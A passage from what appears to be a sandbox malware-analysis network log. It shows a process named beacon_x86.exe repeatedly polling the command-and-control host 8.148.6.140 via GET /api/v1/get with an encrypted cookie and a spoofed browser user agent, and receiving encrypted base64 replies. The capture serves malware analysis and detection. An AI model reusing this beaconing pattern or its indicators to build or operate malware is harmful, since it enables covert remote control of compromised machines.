39 6f 34 47 67 51 34 34 63 6b 31 31 74 50 6c 2b 32 76 33 79 63 7a 48 69 62 33 35 51 48 7a 30 56 59 70 41 32 41 62 59 6d 67 43 6d 55 5a 6b 5a 72 35 53 56 70 76 4d 34 52 50 68 72 64 53 71 76 4d 68 70 52 35 32 78 56 4f 41 68 34 77 73 6c 2b 59 58 36 6f 2f
        Data Ascii: Crob/pYSVZ9HuNNmHqQhBPYQbtAKzGqLNEUMtApdt6N6ZmMsEuPiJpGDKUDjGEkxGkiQUPuxAntVtrnke9yH2gkhvs6NXRlrCo53zyoWxbDYnG5Nrnt/hze5d7myNckqWVlUxYw4BdW8/rwFdKXezDsS7wYwaB8Ej+KBbG0EcFQ4GyLl1uEiBaJ+ILJv37W+XBBTUnAwdaC98916gKc0OMWRlVvqymXcRa9AsLW9VfSM9o4GgQ44ck11tPl+2v3yczHib35QHz0VYpA2AbYmgCmUZkZr5SVpvM4RPhrdSqvMhpR52xVOAh4wsl+YX6o/


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        84192.168.2.8497948.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:28:40.382991076 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:28:44.379884958 CET465INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:28:44 GMT
        Server: nginx
        Content-Length: 280
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 30 38 56 4a 41 42 4e 53 53 43 46 2b 47 68 77 39 4c 77 34 2f 72 44 68 4c 51 30 59 59 4f 76 36 32 31 57 4e 74 64 45 4f 2b 46 54 47 4c 35 30 6d 37 4b 4c 34 4d 76 65 53 53 67 49 70 66 64 78 78 68 6b 59 53 45 33 65 53 50 78 6e 52 50 66 62 48 6d 47 4f 77 4c 53 4b 39 30 54 67 47 75 44 6e 44 58 51 42 66 33 42 4a 4c 78 4b 73 74 47 2b 6d 79 34 51 4e 36 6e 64 62 51 64 72 63 6a 4f 2f 5a 71 4d 4e 30 70 52 58 38 49 4e 43 67 38 58 59 6b 6d 69 79 55 62 42 47 2f 68 70 66 6d 37 2f 39 6c 38 72 6a 65 70 4d 6d 6f 55 70 65 65 36 47 6d 65 42 31 49 6c 4a 4b 4c 58 64 4e 45 53 6e 57 66 34 48 6d 4d 66 2b 7a 4e 2f 6e 79 42 42 54 4f 37 52 7a 71 37 6a 43 51 67 79 64 2b 47 35 44 36 5a 7a 75 6f 49 68 33 33 6d 64 4c 38 4b 46 57 4f 56 43 56 42 77 58 33 5a 6a 36 4a 56 4e 2b 6f 70 2b 48 30 52 57 52 66 71 35 61 38 42 36 62 34 46 57 58 66 58 79 30 69 55 73 77 3d 3d
        Data Ascii: 08VJABNSSCF+Ghw9Lw4/rDhLQ0YYOv621WNtdEO+FTGL50m7KL4MveSSgIpfdxxhkYSE3eSPxnRPfbHmGOwLSK90TgGuDnDXQBf3BJLxKstG+my4QN6ndbQdrcjO/ZqMN0pRX8INCg8XYkmiyUbBG/hpfm7/9l8rjepMmoUpee6GmeB1IlJKLXdNESnWf4HmMf+zN/nyBBTO7Rzq7jCQgyd+G5D6ZzuoIh33mdL8KFWOVCVBwX3Zj6JVN+op+H0RWRfq5a8B6b4FWXfXy0iUsw==


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        85192.168.2.8497958.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:28:44.612925053 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:28:45.576145887 CET185INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:28:45 GMT
        Server: nginx
        Content-Length: 216
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Jan 10, 2025 09:28:45.576221943 CET216INData Raw: 2f 51 42 39 72 51 6d 33 64 6e 61 52 70 6d 46 47 63 4a 4e 4d 54 31 65 2b 39 34 55 33 64 64 70 34 38 33 71 63 48 53 2b 2f 2b 4c 76 51 69 69 6b 43 55 32 7a 44 71 53 44 49 78 46 59 4b 69 73 61 4a 74 39 56 79 57 79 4b 59 34 46 4e 75 4e 73 4c 68 67 6e
        Data Ascii: /QB9rQm3dnaRpmFGcJNMT1e+94U3ddp483qcHS+/+LvQiikCU2zDqSDIxFYKisaJt9VyWyKY4FNuNsLhgnIgnaHfjZ/SEF2u8tXBeK5S8KbnFEPT+tOr5ltTnZ3t4plce6Q6E1NX6bDbqmUudtJQFVFbZgGwWv1krSelvOrxGR77qTu/zYhU1umJ6VjpTKgtF1fPYKttuF6DOxG9itqIJg==


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        86192.168.2.8497968.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:28:45.687546015 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:28:46.673100948 CET529INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:28:46 GMT
        Server: nginx
        Content-Length: 344
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 58 61 2f 44 7a 38 4a 78 4c 76 74 32 52 66 44 54 35 73 70 73 71 79 71 72 51 39 77 67 2b 75 31 62 6c 33 4f 55 69 74 4f 6a 4c 57 68 67 66 6c 62 2f 74 4b 39 4a 78 76 32 47 62 56 69 6a 31 61 50 59 72 38 36 2b 50 77 6f 4e 6a 35 49 47 33 4c 34 4e 59 35 32 2b 43 63 6f 52 44 6b 4c 39 42 74 68 56 64 69 58 45 6a 63 67 47 43 47 4b 42 2b 57 69 35 76 48 6b 4a 73 72 30 55 2f 5a 38 75 53 6f 62 30 63 66 37 6c 77 61 77 52 34 63 51 58 66 33 68 6f 4c 6a 32 45 70 74 31 79 71 59 55 4f 68 2f 64 49 6e 79 63 4c 52 7a 4a 76 74 42 38 32 2b 5a 47 62 6e 44 4d 68 2f 74 61 55 63 4c 70 44 78 69 33 79 66 78 72 62 47 62 4d 61 35 2b 51 79 58 68 2f 6b 48 46 68 70 31 44 64 31 56 7a 74 58 45 4d 39 42 62 67 68 56 6e 44 64 39 64 6c 4e 62 4a 73 6f 74 36 76 57 36 79 4a 37 4a 38 64 39 4a 68 38 38 6b 35 36 57 33 67 42 49 6e 76 67 62 4e 34 36 76 66 42 55 49 43 44 6c 6a 4a 56 54 4d 6e 36 55 34 52 36 50 47 47 54 7a 76 6b 46 4b 51 61 54 4b 45 68 39 65 4f 42 77 5a 32 70 59 54 73 45 55 66 47 4e 6b 53 33 35 6a 78 7a 36 34 5a 68 65 68 55 49 79 5a 54 [TRUNCATED]
        Data Ascii: Xa/Dz8JxLvt2RfDT5spsqyqrQ9wg+u1bl3OUitOjLWhgflb/tK9Jxv2GbVij1aPYr86+PwoNj5IG3L4NY52+CcoRDkL9BthVdiXEjcgGCGKB+Wi5vHkJsr0U/Z8uSob0cf7lwawR4cQXf3hoLj2Ept1yqYUOh/dInycLRzJvtB82+ZGbnDMh/taUcLpDxi3yfxrbGbMa5+QyXh/kHFhp1Dd1VztXEM9BbghVnDd9dlNbJsot6vW6yJ7J8d9Jh88k56W3gBInvgbN46vfBUICDljJVTMn6U4R6PGGTzvkFKQaTKEh9eOBwZ2pYTsEUfGNkS35jxz64ZhehUIyZT0EBQ==


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        87192.168.2.8497978.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:28:46.803208113 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:28:47.753010035 CET441INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:28:47 GMT
        Server: nginx
        Content-Length: 256
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 73 57 6b 36 64 39 2b 32 72 6a 31 68 66 78 57 66 45 30 75 65 30 61 74 79 72 78 31 37 69 4e 61 37 75 6f 2f 31 6e 2f 70 45 67 75 4d 63 56 58 39 57 45 35 4b 55 44 2f 55 64 69 6c 37 77 4c 54 74 6e 50 46 50 73 36 78 76 6d 52 5a 6c 62 52 56 6a 32 37 37 51 62 41 4e 6d 72 46 4e 57 52 4f 71 6d 37 7a 31 64 37 58 5a 4a 74 74 79 70 74 47 72 31 31 66 2b 46 6a 42 73 2f 35 4f 50 61 6e 47 33 58 35 49 51 56 38 34 67 4a 64 36 46 75 66 42 75 53 65 2b 41 42 49 44 46 43 44 67 6e 48 56 32 59 45 75 52 6f 59 53 70 54 6f 49 59 52 6a 64 78 31 2b 56 5a 50 66 62 56 4d 59 4b 51 43 31 59 69 6d 67 34 67 42 4b 73 30 46 65 73 52 69 75 65 55 57 41 6c 66 4a 42 2b 67 2f 6b 6d 32 53 47 2b 31 54 4f 59 57 71 58 31 34 55 45 66 64 6f 30 4d 47 62 4b 70 76 48 78 2b 75 57 41 52 55 4a 36 35 36 56 74 4f
        Data Ascii: sWk6d9+2rj1hfxWfE0ue0atyrx17iNa7uo/1n/pEguMcVX9WE5KUD/Udil7wLTtnPFPs6xvmRZlbRVj277QbANmrFNWROqm7z1d7XZJttyptGr11f+FjBs/5OPanG3X5IQV84gJd6FufBuSe+ABIDFCDgnHV2YEuRoYSpToIYRjdx1+VZPfbVMYKQC1Yimg4gBKs0FesRiueUWAlfJB+g/km2SG+1TOYWqX14UEfdo0MGbKpvHx+uWARUJ656VtO


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        88192.168.2.8497988.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:28:48.000396967 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:28:51.939306021 CET465INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:28:51 GMT
        Server: nginx
        Content-Length: 280
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 4f 5a 70 4c 6e 33 59 54 42 58 37 33 6c 30 2b 78 73 6b 57 39 6a 57 66 61 72 78 36 70 57 73 32 67 78 6c 4d 56 32 74 70 6c 77 7a 78 43 65 77 31 37 68 74 73 55 35 66 63 31 77 4a 38 32 6b 73 69 37 78 4f 44 50 35 63 41 34 2b 59 50 43 74 57 72 6c 6d 64 31 6b 66 37 6d 63 4e 37 4f 43 2b 32 65 54 48 32 6c 57 36 58 62 79 7a 72 37 78 35 54 74 4e 37 6f 51 71 56 34 5a 59 4f 47 52 54 4a 57 43 34 4c 6e 64 35 75 30 6e 47 61 45 4b 53 72 38 59 62 75 76 44 41 55 50 71 55 2f 47 33 46 39 48 68 59 70 55 4f 7a 48 56 5a 6c 75 41 72 48 74 75 7a 65 65 54 4d 69 5a 43 31 2b 4a 4f 44 2b 4c 6f 78 44 4d 38 36 65 48 4a 6e 42 2f 58 58 75 32 74 54 65 72 49 6e 2f 38 2b 41 64 62 58 66 6b 31 75 57 46 45 58 39 45 55 67 54 72 6c 4f 49 4e 5a 6d 4a 76 72 4a 70 32 45 77 57 4f 66 5a 36 72 61 2f 4b 2b 69 76 62 4a 48 62 34 30 35 31 41 39 36 70 30 51 76 59 55 38 57 51 3d 3d
        Data Ascii: OZpLn3YTBX73l0+xskW9jWfarx6pWs2gxlMV2tplwzxCew17htsU5fc1wJ82ksi7xODP5cA4+YPCtWrlmd1kf7mcN7OC+2eTH2lW6Xbyzr7x5TtN7oQqV4ZYOGRTJWC4Lnd5u0nGaEKSr8YbuvDAUPqU/G3F9HhYpUOzHVZluArHtuzeeTMiZC1+JOD+LoxDM86eHJnB/XXu2tTerIn/8+AdbXfk1uWFEX9EUgTrlOINZmJvrJp2EwWOfZ6ra/K+ivbJHb4051A96p0QvYU8WQ==


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        89192.168.2.8497998.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:28:52.062064886 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:28:53.681771040 CET185INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:28:53 GMT
        Server: nginx
        Content-Length: 192
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Jan 10, 2025 09:28:53.681925058 CET192INData Raw: 54 6b 4e 6c 67 41 53 6e 35 76 66 4e 33 56 6f 51 6d 55 51 58 63 78 73 37 4a 50 5a 39 35 76 36 48 62 4c 74 6f 34 51 42 30 59 36 35 58 53 32 35 76 75 36 58 75 5a 53 52 49 35 58 37 58 67 73 63 6c 6e 78 36 76 54 58 61 56 75 49 61 37 68 6f 77 56 50 43
        Data Ascii: TkNlgASn5vfN3VoQmUQXcxs7JPZ95v6HbLto4QB0Y65XS25vu6XuZSRI5X7Xgsclnx6vTXaVuIa7howVPCS4wk4Lmk+aeXQspl1N5vrvZ1oxR10/fVWHHCL5diG9FlhJCVG4/B98n+mKovCGeVzGO5+ILQCRyTXmwrxWMkAAQi2I/s+wJkICH/IQOl/b15WS


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        90192.168.2.8498008.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:28:53.797283888 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:28:54.773519039 CET441INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:28:54 GMT
        Server: nginx
        Content-Length: 256
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 73 33 42 75 50 72 46 75 4a 50 44 34 58 36 49 73 46 51 66 36 39 39 4e 38 64 68 66 62 36 6d 6c 4e 54 65 67 38 64 2b 6c 50 48 56 49 59 30 31 4b 62 38 6f 36 6b 38 46 42 53 49 4b 44 36 6c 63 50 4d 38 33 70 67 57 6d 69 62 6b 6a 49 7a 5a 39 6d 44 6d 73 31 52 67 39 5a 31 47 31 41 50 57 77 2f 79 74 7a 6e 66 6f 38 42 56 64 51 78 7a 75 6f 59 44 45 38 54 79 75 57 68 30 75 69 6e 68 70 32 4d 74 59 4d 4d 6b 6c 4e 33 34 72 76 6f 38 33 6c 37 51 38 69 31 77 71 35 41 7a 61 4d 71 57 58 4c 34 78 4a 43 2b 46 6f 76 56 6e 7a 6a 52 59 79 7a 62 2f 47 70 6a 47 44 74 79 72 32 46 57 4c 64 59 63 45 4d 4a 2f 50 4e 7a 66 62 4f 6b 58 5a 6b 59 70 72 45 4e 32 49 37 31 4c 53 69 58 49 39 44 2f 53 31 59 50 6d 37 53 62 4c 58 45 58 54 61 54 4a 34 4a 55 44 38 46 2f 6a 2b 6d 50 52 75 61 2f 2f 64 75
        Data Ascii: s3BuPrFuJPD4X6IsFQf699N8dhfb6mlNTeg8d+lPHVIY01Kb8o6k8FBSIKD6lcPM83pgWmibkjIzZ9mDms1Rg9Z1G1APWw/ytznfo8BVdQxzuoYDE8TyuWh0uinhp2MtYMMklN34rvo83l7Q8i1wq5AzaMqWXL4xJC+FovVnzjRYyzb/GpjGDtyr2FWLdYcEMJ/PNzfbOkXZkYprEN2I71LSiXI9D/S1YPm7SbLXEXTaTJ4JUD8F/j+mPRua//du


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        91192.168.2.8498018.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:28:54.890147924 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        92192.168.2.8498028.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:28:59.546215057 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:29:00.536429882 CET401INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:29:00 GMT
        Server: nginx
        Content-Length: 216
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 53 32 54 45 39 31 7a 71 52 51 63 65 79 53 6b 42 73 72 4e 56 49 6d 2b 66 48 6a 36 34 4f 45 6e 6f 6a 6f 5a 35 65 7a 69 6a 2f 34 4f 47 73 61 4e 72 67 30 71 61 65 65 54 56 71 55 4d 49 64 78 5a 79 41 4d 4f 2f 67 71 33 2f 72 4e 62 4a 30 53 2b 54 6f 65 30 76 30 37 67 31 77 73 42 65 68 2f 4e 7a 32 37 4f 67 2f 58 4a 6b 67 46 6a 37 45 72 34 56 67 58 59 77 71 58 46 61 39 4f 6e 54 34 67 66 79 62 74 76 62 53 44 53 77 35 57 6f 2f 59 6d 63 67 49 37 78 72 74 39 67 4c 45 49 38 49 4d 62 41 63 78 61 77 6d 7a 33 58 48 42 67 34 64 32 6c 6d 52 5a 72 31 54 6d 39 38 4d 54 61 4a 68 74 47 43 79 38 4c 30 62 57 75 74 4b 6f 37 4f 6c 34 47 59 77 46 57 6e 6d 64 77 3d 3d
        Data Ascii: S2TE91zqRQceySkBsrNVIm+fHj64OEnojoZ5ezij/4OGsaNrg0qaeeTVqUMIdxZyAMO/gq3/rNbJ0S+Toe0v07g1wsBeh/Nz27Og/XJkgFj7Er4VgXYwqXFa9OnT4gfybtvbSDSw5Wo/YmcgI7xrt9gLEI8IMbAcxawmz3XHBg4d2lmRZr1Tm98MTaJhtGCy8L0bWutKo7Ol4GYwFWnmdw==


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        93192.168.2.8498038.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:29:00.655646086 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:29:02.417505026 CET337INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:29:02 GMT
        Server: nginx
        Content-Length: 152
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 71 55 55 55 48 30 52 4b 50 47 76 56 35 4f 4d 77 71 59 4c 50 6f 4b 43 49 45 70 6f 4e 76 78 37 78 63 55 61 2f 6f 44 69 51 62 30 55 2f 33 65 61 7a 4e 64 6d 49 35 2f 76 72 42 78 53 4c 6c 4a 6c 30 69 71 69 73 46 67 55 68 5a 61 6f 2b 66 6c 77 48 69 55 7a 55 5a 6f 75 6d 56 78 77 53 52 62 4f 38 79 65 69 4c 36 59 53 59 43 57 34 6b 39 56 4f 47 35 57 79 43 4d 53 43 43 44 6b 5a 71 6a 67 52 6f 57 4c 57 62 73 54 71 44 33 31 51 71 43 68 6d 34 51 41 57 49 4d 67 3d 3d
        Data Ascii: qUUUH0RKPGvV5OMwqYLPoKCIEpoNvx7xcUa/oDiQb0U/3eazNdmI5/vrBxSLlJl0iqisFgUhZao+flwHiUzUZoumVxwSRbO8yeiL6YSYCW4k9VOG5WyCMSCCDkZqjgRoWLWbsTqD31QqChm4QAWIMg==


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        94192.168.2.8498048.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:29:02.547645092 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:29:03.528382063 CET401INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:29:03 GMT
        Server: nginx
        Content-Length: 216
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 56 79 75 47 67 32 42 78 6f 4e 4b 6f 58 53 30 41 77 62 4a 58 45 64 38 6c 5a 75 41 48 67 39 61 71 7a 5a 72 43 6a 43 77 33 45 76 5a 50 4a 48 2b 7a 47 59 58 75 57 4d 79 49 55 72 54 65 5a 44 57 4e 57 64 70 4c 6e 59 47 54 64 71 46 78 50 6e 43 58 37 68 43 34 7a 2b 36 6a 30 49 7a 64 2b 74 6a 74 68 31 75 45 68 49 75 79 47 65 72 50 4e 62 57 2b 50 64 31 4d 4c 2b 6c 6e 35 54 6f 55 32 69 76 77 56 6d 38 73 42 2b 33 45 43 6d 33 36 74 6f 61 70 54 74 50 62 37 53 57 31 74 32 65 73 49 59 67 53 36 64 78 47 2b 66 47 33 6a 6d 73 48 5a 43 47 33 43 5a 44 4b 66 52 52 45 48 61 48 47 32 4f 6b 50 70 30 75 50 54 44 44 55 7a 52 30 47 61 69 67 67 45 6a 4c 58 56 51 3d 3d
        Data Ascii: VyuGg2BxoNKoXS0AwbJXEd8lZuAHg9aqzZrCjCw3EvZPJH+zGYXuWMyIUrTeZDWNWdpLnYGTdqFxPnCX7hC4z+6j0Izd+tjth1uEhIuyGerPNbW+Pd1ML+ln5ToU2ivwVm8sB+3ECm36toapTtPb7SW1t2esIYgS6dxG+fG3jmsHZCG3CZDKfRREHaHG2OkPp0uPTDDUzR0GaiggEjLXVQ==


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        95192.168.2.8498058.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:29:03.639604092 CET544OUTGET /api/v1/get HTTP/1.1
